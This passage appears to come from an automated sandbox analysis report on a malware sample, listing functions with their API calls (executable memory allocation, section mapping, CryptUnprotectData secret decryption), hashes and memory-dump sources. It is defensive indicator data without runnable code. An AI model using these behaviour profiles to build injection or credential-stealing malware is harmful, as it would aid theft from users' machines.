                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: )$IDAT$IEND$IHDR
                    • API String ID: 0-3181356877
                    • Opcode ID: a66c65334b1b6ddfe36c841ce3fc1cf4552cb8871a535dab1fa0272f476d1424
                    • Instruction ID: fabcefcacc59bc09d7144dc9cd84607eefd995238f51b24c13b053278638d0e3
                    • Opcode Fuzzy Hash: a66c65334b1b6ddfe36c841ce3fc1cf4552cb8871a535dab1fa0272f476d1424
                    • Instruction Fuzzy Hash: 03022671A083808FD715CF28D890B9B7BE5EF85308F05862DFA858B792D779D909CB91
                    Function 003E5640 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5795
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E57F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: @
                    • API String ID: 292159236-2766056989
                    • Opcode ID: 5ef6eaf41adedcf0f6d2c5c3fccc73c6b897e4ba6fac9e713344d5e36b94ac60
                    • Instruction ID: d3c94e936d2adf19700db77f83480d06950029b45db2a9c999cc1b1a642500d1
                    • Opcode Fuzzy Hash: 5ef6eaf41adedcf0f6d2c5c3fccc73c6b897e4ba6fac9e713344d5e36b94ac60
                    • Instruction Fuzzy Hash: 3D419CB20097149FD711CF14C845B2BB7E8EF85368F554A1DF5A49B2E0E3B4D908CBA2
                    Function 003E5BD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5CD5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E5D27
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: @
                    • API String ID: 292159236-2766056989
                    • Opcode ID: 9285d59e57a99cade7a1b607fa97a38b7839e18b25e81e63b13b090408cc04b8
                    • Instruction ID: d0875e057a360959373b75700a17dbab51fae63107a15318b4fb097a1e95cdab
                    • Opcode Fuzzy Hash: 9285d59e57a99cade7a1b607fa97a38b7839e18b25e81e63b13b090408cc04b8
                    • Instruction Fuzzy Hash: 2D315BB11093159FD300CF14C844B2BBBE8FF88358F048A2CF9A49B3A0D3B49948CB92
                    Function 003E5940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E59F4
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E5A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: $
                    • API String ID: 292159236-3993045852
                    • Opcode ID: e8adc466331c8b1d8802d5da424aefb1964e30d69a2ada2e62ce07b4b218c4c7
                    • Instruction ID: 2e7f200ee5e66e21fa104d0b91bd80b8da238c04694800ee3680d00aa8631f6d
                    • Opcode Fuzzy Hash: e8adc466331c8b1d8802d5da424aefb1964e30d69a2ada2e62ce07b4b218c4c7
                    • Instruction Fuzzy Hash: C4319F71208314AFD311CF19CC41B6BBBE8EB84728F114A2DFAA49B3D0D7B19904CB92
                    Function 003C8E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003C8EF1
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003C8F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: ,
                    • API String ID: 292159236-3772416878
                    • Opcode ID: 73d2d1321c5c72839420fd2f5fab1ad9882743a3a3dfef2dcf5ab76e3377136b
                    • Instruction ID: d19bf84612fc339c53390399a90f651f900c490a8247d51c05758e3eecb91640
                    • Opcode Fuzzy Hash: 73d2d1321c5c72839420fd2f5fab1ad9882743a3a3dfef2dcf5ab76e3377136b
                    • Instruction Fuzzy Hash: 1A314772109304AFD311CF14DC40B2BBBE9FB88754F148A1DFAA89B390D7B19944CBA2
                    Function 003C46B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C475E
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C47A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: MyC
                    • API String ID: 292159236-2519405844
                    • Opcode ID: ccd4de19412878fc7e62474c5016c80e60ffe9b75ee4ae4dcd6e8f454510e5d8
                    • Instruction ID: 8b41674cd75270c51352c382fbf0a6e088eabec8ee46b5bd233ade236699a137
                    • Opcode Fuzzy Hash: ccd4de19412878fc7e62474c5016c80e60ffe9b75ee4ae4dcd6e8f454510e5d8
                    • Instruction Fuzzy Hash: 6A317EB19111199FDF15CF94D881BEEBBB8FB08314F140219EA22FB390D7B46945CBA4
                    Function 003D3216 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 721COMMON
                    Download Yara Rule
                    APIs
                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 003D3876
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: InstalledMemoryPhysicallySystem
                    • String ID: U;Gy
                    • API String ID: 3960555810-1665677991
                    • Opcode ID: 8c797a3c7461ddc060b3b0c4bfa680badbb74ea780a2bf0dd08a012b32d89799
                    • Instruction ID: ab51ea6a11fe68dce61cc055f9224a54beae40de5b3e079e7bfa4d5dc401aac4
                    • Opcode Fuzzy Hash: 8c797a3c7461ddc060b3b0c4bfa680badbb74ea780a2bf0dd08a012b32d89799
                    • Instruction Fuzzy Hash: 37522A71104B808AE766CF35D0A87A3BBE1BF16304F54895DD0FB8B782D779A909CB51
                    Function 003C4F69 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C51D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: CryptDataUnprotect
                    • String ID: 6
                    • API String ID: 834300711-498629140
                    • Opcode ID: a0eb151e3ea132758d25629e7a3d3590acbd5e95642af02772e2ddf3e51001bf
                    • Instruction ID: 84320008c419f24eec41ba1fbe21989e09c463c903fc75d139ccfb6f344b4641
                    • Opcode Fuzzy Hash: a0eb151e3ea132758d25629e7a3d3590acbd5e95642af02772e2ddf3e51001bf
                    • Instruction Fuzzy Hash: 9D61BCB15083819FC721CF28C491B5BBBE1BB95308F448A2DE4E98B382D735E945CB92
                    Function 003E2C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E2C36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FreeMemoryVirtual
                    • String ID: JM
                    • API String ID: 3963845541-1126336605
                    • Opcode ID: 1164378ab9268167fd2154cffd2a83ca65b75b932685fff03604fa06646d9405
                    • Instruction ID: 23e4a067cc9ad55d2dc08d81f85cb8447eeb3e6d0301cf96df2d910466a40190
                    • Opcode Fuzzy Hash: 1164378ab9268167fd2154cffd2a83ca65b75b932685fff03604fa06646d9405
                    • Instruction Fuzzy Hash: 863131791047818BD71ACF26DC90B273BA8BB06329F28475DC4A3CBAE2C634E44AC704
                    Function 003E286A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33nativeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: Close
                    • String ID: `LC
                    • API String ID: 3535843008-76481041
                    • Opcode ID: 6839dc090dbf2a681d5c8bbdbb3522ce9094d1e822812731491f082b68f2a2f4
                    • Instruction ID: 80df2397a0c82458558e534fa5cc4728889c2c2019bf28c2c465e33ea42b3251
                    • Opcode Fuzzy Hash: 6839dc090dbf2a681d5c8bbdbb3522ce9094d1e822812731491f082b68f2a2f4
                    • Instruction Fuzzy Hash: 30E01276484014EBCB07FB68FC42D343665EFA9305B001570E802D5272DB635A28DE15
                    Function 003D20C1 Relevance: 3.2, APIs: 2, Instructions: 178COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b759b0c3bde687b499e1b6fbd866033e0cea544f63f41cbdea36ec58838773e5
                    • Instruction ID: 43efc337ada19a1d44aaf529260f18975b7e4b30eb6e4199d200d5dd58a26b8e
                    • Opcode Fuzzy Hash: b759b0c3bde687b499e1b6fbd866033e0cea544f63f41cbdea36ec58838773e5
                    • Instruction Fuzzy Hash: 1E618D31109B818FD323CB38C850BA3BBF5BF56304F488A9ED1EACB292D7656509CB50
                    Function 003E5810 Relevance: 3.1, APIs: 2, Instructions: 94nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E58B5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E590D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 187d45e30820cc13a54d2e177eb53af294a06cc3974e0718c9d3afefaab82dac
                    • Instruction ID: 1a681a156da31d90a0da75c8914740c4b5deb3ac0373e626f7e9bf3ac916ed11
                    • Opcode Fuzzy Hash: 187d45e30820cc13a54d2e177eb53af294a06cc3974e0718c9d3afefaab82dac
                    • Instruction Fuzzy Hash: C2318F75208355AFD711CF14D845B6FB7E8EB84324F01861DF9A4973D0D7B09A08CB92
                    Function 003C4D10 Relevance: 3.1, APIs: 2, Instructions: 87nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C4DAC
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 003C4E03
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: ac38286d634064dd3f80a967dd5cc97a424d33990ff0afc86ea42b51500f4dcc
                    • Instruction ID: 9b4e033720cd6f7b39a6bc914667afeb98ba893a223470d07fd794ca27a1f0c5
                    • Opcode Fuzzy Hash: ac38286d634064dd3f80a967dd5cc97a424d33990ff0afc86ea42b51500f4dcc
                    • Instruction Fuzzy Hash: FD3143B1109345AFD756CF14C885B6BBBF9FB88314F405A1CFAA58B2A0D7B1D844CB52
                    Function 003C541A Relevance: 3.1, APIs: 2, Instructions: 84nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C54D9
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 003C552D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: a31444d4b2bcebeaac0d17e077bd837d143eb5cd98272b540870e809e81cdf1d
                    • Instruction ID: c625eeed5aa3c38dc710087baa606b64e614e5cf4c772f27c6cff6371000e100
                    • Opcode Fuzzy Hash: a31444d4b2bcebeaac0d17e077bd837d143eb5cd98272b540870e809e81cdf1d
                    • Instruction Fuzzy Hash: 07318BB11193409FD325CF18C881B6BB7E8BB84318F445A2CF6A5DB3A0D7B4D844CB56
                    Function 003C4280 Relevance: 3.1, APIs: 2, Instructions: 77nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003C4321
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C4365
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: dce35456e2f6c61bee21f4a4b019d6d1e3c5ad63379e256f47f1aa6202e2c2e5
                    • Instruction ID: 0701351a5f35d3b96aab9f46e639e583056185c3b751686e4fd0440f99269a58
                    • Opcode Fuzzy Hash: dce35456e2f6c61bee21f4a4b019d6d1e3c5ad63379e256f47f1aa6202e2c2e5
                    • Instruction Fuzzy Hash: 8F219A71109311AFD311CF18D885B2FBBE8EB84764F118A1CF9A58B390D7B59C48CBA2
                    Function 003C56F7 Relevance: 3.1, APIs: 2, Instructions: 71nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C5AE5
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 003C5B39
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 94d9175e7e328aca9be887c78d27ef082c5dc859e38976ca7d9f65328f5f6181
                    • Instruction ID: 8ba3df0d140103997c84cde76e96f8870f7288c17fe24dee28489d839abdca69
                    • Opcode Fuzzy Hash: 94d9175e7e328aca9be887c78d27ef082c5dc859e38976ca7d9f65328f5f6181
                    • Instruction Fuzzy Hash: C5316D71219340AFD765CF04C885B6BB7E8FB84354F405A1CF5A5CB3A0CBB49945CB52
                    Function 003E27F1 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000002), ref: 003E282D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
